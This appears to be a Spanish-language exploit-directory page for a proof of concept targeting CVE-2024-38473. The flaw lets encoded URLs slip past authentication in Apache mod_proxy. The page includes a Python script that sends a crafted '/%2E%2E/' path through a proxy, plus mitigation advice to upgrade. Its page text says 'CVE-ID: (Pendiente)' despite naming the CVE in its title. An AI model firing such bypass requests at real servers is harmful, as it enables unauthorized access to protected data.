Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-38473 — Prueba de concepto que demuestra una falla de codificación en mod_proxy de Apache HTTP Server que puede eludir la autenticación mediante URL codificadas manipuladas. | Kitploit
Herramientas/GitHubGitHub/abdurahmon3236/cve-2024-38473
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Prueba de concepto que demuestra una falla de codificación en mod_proxy de Apache HTTP Server que puede eludir la autenticación mediante URL codificadas manipuladas.

Ver Repositorio
324hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto (PoC) para el Problema de Codificación en mod_proxy en Apache HTTP Server

Este repositorio contiene scripts de Prueba de Concepto (PoC) para demostrar un problema de codificación en el módulo mod_proxy de Apache HTTP Server versiones 2.4.59 y anteriores. Esta vulnerabilidad permite que las URL de solicitud con codificación incorrecta se envíen a servicios backend, potencialmente evadiendo la autenticación mediante solicitudes manipuladas.

Tabla de Contenidos

  • Descripción de la Vulnerabilidad
  • Configuración y Uso
  • Consideraciones Importantes
  • Mitigación

Descripción de la Vulnerabilidad

CVE-ID: (Pendiente)

Resumen: Un problema de codificación en el módulo mod_proxy de Apache HTTP Server versiones 2.4.59 y anteriores permite que las URL de solicitud con codificación incorrecta se envíen a servicios backend. Esto puede potencialmente evadir los mecanismos de autenticación mediante solicitudes manipuladas. Se recomienda a los usuarios actualizar a la versión 2.4.60, que corrige este problema.

Versiones Afectadas:

  • Apache HTTP Server 2.4.59 y anteriores

Versión Corregida:

  • Apache HTTP Server 2.4.60

Configuración y Uso

Requisitos Previos

  • Python 3.x
  • Biblioteca requests (pip install requests)

Demostración de la Vulnerabilidad

  1. Identifique el Servicio Backend:

    • Asuma que el servicio backend se encuentra en http://backend-service.example.com.
  2. Elabore una Solicitud Maliciosa:

    • La solicitud maliciosa utilizará codificación incorrecta para evadir la autenticación.
  3. Ejecute el Script PoC:

    • Guarde el siguiente script como mod_proxy_poc.py y ejecútelo.

Script PoC

Aquí hay un script en Python que demuestra la vulnerabilidad:

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

Explicación

  1. Configuración:

    • proxy_url: La URL del servidor proxy.
    • backend_service_path: La ruta al recurso protegido en el servicio backend.
    • malicious_path: La ruta incorrectamente codificada para evadir la autenticación.
  2. send_malicious_request:

    • Construye una URL maliciosa con la ruta incorrectamente codificada.
    • Envía una solicitud GET al servidor proxy con la URL maliciosa.
    • Imprime los detalles de la respuesta para verificar si se evadió la autenticación.

Consideraciones Importantes

  • Permisos: Asegúrese de tener permiso explícito para probar esta vulnerabilidad en el sistema objetivo. El acceso no autorizado es ilegal y no ético.
  • Entorno de Pruebas: Realice esta prueba en un entorno controlado para evitar afectar sistemas de producción.

Mitigación

Para mitigar esta vulnerabilidad, actualice a la versión 2.4.60 de Apache HTTP Server, la cual corrige el problema de codificación en el módulo mod_proxy.

  • Instrucciones de Actualización:
    • Siga la documentación oficial de Apache HTTP Server para descargar e instalar la última versión.

Manteniendo su software actualizado y siguiendo las mejores prácticas de seguridad, puede prevenir vulnerabilidades como este problema de codificación en el módulo mod_proxy.

Descargar herramienta